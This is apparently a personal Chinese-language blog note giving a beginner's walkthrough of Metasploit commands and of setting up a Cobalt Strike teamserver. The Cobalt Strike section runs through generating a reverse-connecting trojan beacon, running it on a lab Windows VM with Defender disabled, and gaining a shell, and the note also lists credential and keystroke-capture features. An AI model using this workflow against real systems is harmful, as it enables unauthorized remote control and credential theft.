cobalt strikemetasploit 小记
cobalt strike&metasploit 小记
脚本小子的最爱
更新ing
1. metasploit
大致流程:
msfconsole #在kali运行msf软件
search 漏洞编码 #(MSXX-XX/CVE-XXXX-XXX/关键字/msf 模块信息)
use xxx #(exploit auxiliary payload post)
info #查看详细信息
show options #查看选项
--set target #系统主机
--set rhosts xx.xx.xx.xx -- #攻击的目标主机
--set lhosts xx.xx.xx.xx -- #kali主机地址
exploit/run #开始攻击
渗透成功,就会建立会话信息(kali--目标主机)
会话管理命令:upload download等
back #退出当前模块
quit #退出msf
sessions
session1
shell 开启shell
jobs 查看任务
jobs -K 删除任务
2. cobalt strike
注意软件可能有后门
没法在beacon的终端再开一个交互式的终端
1. 环境搭建
我用的华为云服务器,进站规则添加放行10086端口
在服务器上看CS默认连接端口(50050)是否开放
我这里使用10086端口
安装java环境
sudo apt update
sudo apt install openjdk-11-jre -y
sudo apt install openjdk-11-jdk -y
java -version
将cobalt strike 4.8文件夹里的Server文件夹拷贝到服务器上
vim ./teamserver,修改以下配置
-Dcobaltstrike.server_port=10086
赋予权限并启动团队服务器
xxx.xxx.xxx.xxx为服务器ip,123456为客户端连接密码
chmod 777 ./teamserver
chmod 777 ./TeamServerImage
./teamserver xxx.xxx.xxx.xxx 123456
客户端修改cobaltstrike-client.cmd
同下
@echo off
echo [+] Starting cobaltstrike client
java -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:uHook.jar -jar cobaltstrike-client.jar $*
客户端启动cobaltstrike-client.cmd
登录到团队服务器
2. 简单操作
下面演示反向连接(受害机连接攻击机)
win10虚拟机关防火墙,然后病毒和威胁防护->管理设置->关闭实时保护等,不然要做免杀。
主机也关一下防火墙。
新建监听器
生成非分离的后门木马,丢进win10虚拟机中。
双击运行木马,可以看到上线了
可以在beacon输入sleep 10
更改睡眠延迟时间,然后shell whoami
小电脑图标中间是亮的,说明连接还在。
3. 插件安装
从某些渠道得到插件后。
cobalt strike->script manager,然后导入.cna文件
4. 相关语法与中英对照
常见本体及插件英文如下
英文 | 一般释义 | cs中具体含义 |
---|---|---|
elevate | [ˈelɪveɪt] 提升 | 与提权有关 |
spawn | [spɔːn] 产卵;引发;派生 | 这里一般指会话派生,将当前会话传递至其他CS团队服务器中或将当前会话传递至MSF中联动 |
credentials | [krəˈdenʃlz] 资格证书;凭证 | 用于存储和管理通过不同方式获取的密码、散列值(hash)以及其他认证信息 |
keystrokes | 按键 | log keystrokes 用于记录键盘输入记录 |
beacon | [ˈbiːkən] 信标 | 它作为轻量级的“受害者”代理,提供了一个交互式的Shell环境 |
pivoting | [ˈpɪvətɪŋ] 在枢轴上旋转 | 跳板,它允许攻击者利用一个已经控制的系统作为跳板,将攻击流量转发至其他系统。 |
sniffer | [ˈsnɪfə] 嗅探器 | 一般用于网络流量嗅探 |